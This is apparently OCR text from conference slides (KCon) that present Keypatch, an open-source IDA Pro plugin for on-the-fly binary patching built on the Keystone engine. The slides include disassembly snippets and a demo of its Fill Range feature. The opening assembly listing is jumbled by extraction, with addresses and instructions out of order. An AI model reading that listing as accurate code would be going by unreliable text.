                                                                  --> 0x080cbd9f
  0x080cbd9c
                    90
                                                                   -> 0x080cbda0
  0x080cbd9d
                    90
                                                                      0x080cbda1
  0x080cbd9e
                     90
                                                                                                          pop ebp
                    90
  0x080cbd9f
                                                                       0x080cbda3
0x080cbda0
  0x080cbda1
                     89e5
                                     mov ebp, esp
                                                                       0x080cbda5
                                                                                                          pop edi
  0x080cbda3
                                                                      0x080cbda6
```

0x080cbda7

0x080cbda8

83ec2c

sub esp, 0x2c

### One More Thing

#### The IDA Pro



#### **IDA Pro**

- RE Standard
- Patching on the fly is always a must
- Broken "Edit\Patch Program\ Assembler" is always giving us problem









#### Keypatch



#### A binary editor plugin for IDA Pro

- Fully open source @ https://keystone-engine.org/keypatch
- On the fly patching in IDA Pro with Multi Arch
- Base on Keystone Engine
- By Nguyen Anh Quynh & Thanh Nguyen (rd) from vnsecurity.net





```
CODE XREF: sub 158D3+211j
shl
        esi, 4
iz
        short loc 158F6
mov
        edi, esi
                         ; size
call
        malloc
test
        rax, rax
                           Keypatch modified this from:
xor
        eax, eax
                            jz short loc 158F6
        ecx, 800h
mov
        rdi, rax
mov
        rsi, rbp
mov
```

#### Latest Keypatch and DEMO

# K

#### Fill Range

Select Start, End range and patch with bytes

Goto: Edit | Keypatch | Fill Range

QQ: 2880139049







## THANKS

[Hacker@KCon]